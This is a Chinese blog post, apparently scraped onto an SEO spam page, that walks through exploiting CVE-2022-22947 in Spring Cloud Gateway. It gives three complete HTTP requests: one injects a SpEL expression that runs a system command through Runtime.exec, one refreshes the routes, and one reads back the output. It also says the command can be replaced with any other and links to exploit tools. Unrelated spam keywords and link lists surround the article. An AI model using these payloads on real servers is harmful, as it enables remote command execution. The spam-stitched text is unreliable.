当前位置: 首页 > news >正文

丽江市网站建设制作sem网站推广怎么做

丽江市网站建设制作,sem网站推广怎么做,我的学校网页模板,做老师一些好的网站Spring boot命令执行 (CVE-2022-22947)漏洞复现和相关利用工具 名称: spring 命令执行 (CVE-2022-22947) 描述: Spring Cloud Gateway是Spring中的一个API网关。其3.1.0及3.0.6版本(包含)以前存在一处SpEL表达式注入漏洞,当攻击者可以访问A…

Spring boot命令执行 (CVE-2022-22947)漏洞复现和相关利用工具

名称: spring 命令执行 (CVE-2022-22947)

描述: Spring Cloud Gateway是Spring中的一个API网关。其3.1.0及3.0.6版本(包含)以前存在一处SpEL表达式注入漏洞,当攻击者可以访问Actuator API的情况下,将可以利用该漏洞执行任意命令。

影响版本:

Spring Cloud Gateway 3.1.x < 3.1.1

Spring Cloud Gateway 3.0.x < 3.0.7

第一个数据包

打开靶场抓取请求的数据包

切换成POST模式,请求这个地址,提交内容如下:返回201即为成功

可以更换请求路径中的test为你自己的方法,也可以更换value值里面的id命令为其它执行命令

POST /actuator/gateway/routes/test HTTP/1.1
Host: 192.168.91.129:15001
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:106.0) Gecko/20100101 Firefox/106.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/json
Content-Length: 329{"id": "hacktest","filters": [{"name": "AddResponseHeader","args": {"name": "Result","value": "#{new String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{\"id\"}).getInputStream()))}"}}],"uri": "http://example.com"
}

image

第二个数据包

再请求这个路径:

POST /actuator/gateway/refresh HTTP/1.1
Host: 192.168.91.129:15001
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:106.0) Gecko/20100101 Firefox/106.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 3123

image

第三个数据包

再请求这个路径命令就会被执行。

GET /actuator/gateway/routes/test HTTP/1.1
Host: 192.168.91.129:15001
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh-HK;q=0.9,zh;q=0.8
Cookie: b-user-id=98bc3e19-a246-205e-df14-b0f6176e841d; vue_admin_template_token=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyX2lkIjoxLCJ1c2VybmFtZSI6ImFkbWluIiwiZXhwIjoxNzAxMzMzMTQxLCJlbWFpbCI6IiJ9.AlEzzqoZtAFFONBaJRMjjMEji7OJNLT8UxrAgbttBqc; sidebarStatus=0; JSESSIONID=6F5D2993DEE6FC179A1F71F6045DE7AA
If-None-Match: "3147526947+gzip"
If-Modified-Since: Thu, 17 Oct 2019 07:18:26 GMT
Connection: close

image

在这三次的请求中,会更换请求头的内容。如果发现卡住不成功的情况。那就重新抓一个包

如果要执行其它命令需要从第一步到第三步都请求一遍。

也有利用工具:

https://github.com/0x727/SpringBootExploit

image

https://github.com/13exp/SpringBoot-Scan-GUI

http://www.15wanjia.com/news/56464.html

相关文章:

  • 医疗美容建网站制定营销推广方案
  • 网站建设必须要主机吗设计师培训班多少钱
  • 龙岗附近网站建设营销推广的主要方法
  • 网站结构怎么优化网络推广网站电话
  • 教育机构网站源码电脑培训班有哪些科目
  • 做系统的网站seo关键词优化公司
  • 网站建设包括哪方面内蒙古最新消息
  • php动态网站开发实训目的媒体发稿推广
  • 深圳 建设银行国际互联网站公司网络营销策略
  • WordPress最强网站seo优化专员
  • 图片分页网站模板360seo排名优化服务
  • 设计师a 网站免费网络推广渠道
  • 做网站一般注册哪几类商标网络营销的未来发展趋势论文
  • 临沂做网站建设的公司哪家好国内新闻热点事件
  • 网站如何做品牌宣传海报太原互联网推广公司
  • 做关于卖宠物饲料网站有什么名字吗厦门seo起梦网络科技
  • 做网站招商需要具备什么恶意点击软件有哪些
  • 申请收费网站空间徐州网络推广服务
  • 做网站除了有服务器还需要什么网页设计参考网站
  • 如何了解和掌握一个网站的权重丈哥seo博客
  • 番禺网站优化百度网站介绍
  • 秦皇岛哪家公司网站建设好怎么接推广
  • 网站不显示内容吗网页怎么做
  • 博客和网站的区别爱奇艺科技有限公司
  • 网站制作论文优帮云怎么自己做网站
  • 对比色的网站互联网广告是做什么的
  • 松江郑州阳网站建设怎么做推广和宣传平台
  • 济南房产网签查询系统搜索引擎关键词快速优化
  • 做门户网站长沙社区赚钱吗网站制作培训
  • 现在为什么网站都打不开了怎么办啊代写文章的平台有哪些